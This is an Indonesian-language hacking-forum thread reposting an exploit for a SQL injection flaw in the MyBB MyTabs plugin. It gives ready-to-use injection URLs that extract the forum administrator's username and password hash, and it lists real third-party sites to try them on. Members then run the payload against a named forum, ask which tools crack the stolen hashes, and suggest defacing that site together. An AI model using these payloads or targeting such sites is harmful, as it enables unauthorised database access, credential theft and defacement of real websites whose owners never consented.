MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

[Dr.Localhost]

Assalamualaikum warahmatullah wabarakatuh
dapet di forum luar , di buat

Code:

================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -



You can try on this site

http://secworm.net/forums/index.php?tab=1'
http://icanhazcookie.net/index.php?tab=1'

ane coba di Devilzc0de

Quote:http://devilzc0de.org/forum/index.php

sesudah itu ane coba make code inject di atas
penampakan :

1 .http://devilzc0de.org/forum/index.php?tab=1'
2. http://devilzc0de.org/forum/index.php?tab=1

jika make no 1 . akan tetap di index forum
jika make no 2 akan di direct ke

devilzc0de.org/index.php?tab=1

[chaer.newbie]

devilzc0de.org/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

[Dr.Localhost]

(12-04-2011 06:45 AM)chaer.newbie Wrote:  devilzc0de.org/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

[selfdefense]

wewww.... klo mo liat user hasil injectnya di bagian mana om...?
ane coba yg DC suman keluar index doang tuh....

[HeriNHT]

klo mybb inject nya msalah nya sampe sekarang hash nya pake toolz ap

[74jTeZ]

dah gak bisa di dc..

[HeriNHT]

Toolz Untuk Hash Nya Apa :)

[schumbag]

kelamongan ciyn yo ayo kita deface dc bareng2 biar chaer gk kelar2 skripsinya
jangan DdoS ntar kita mati gaya

[HeriNHT]

Klo Di DDos Om Chaer Ngamuk bahaya serius jaga DC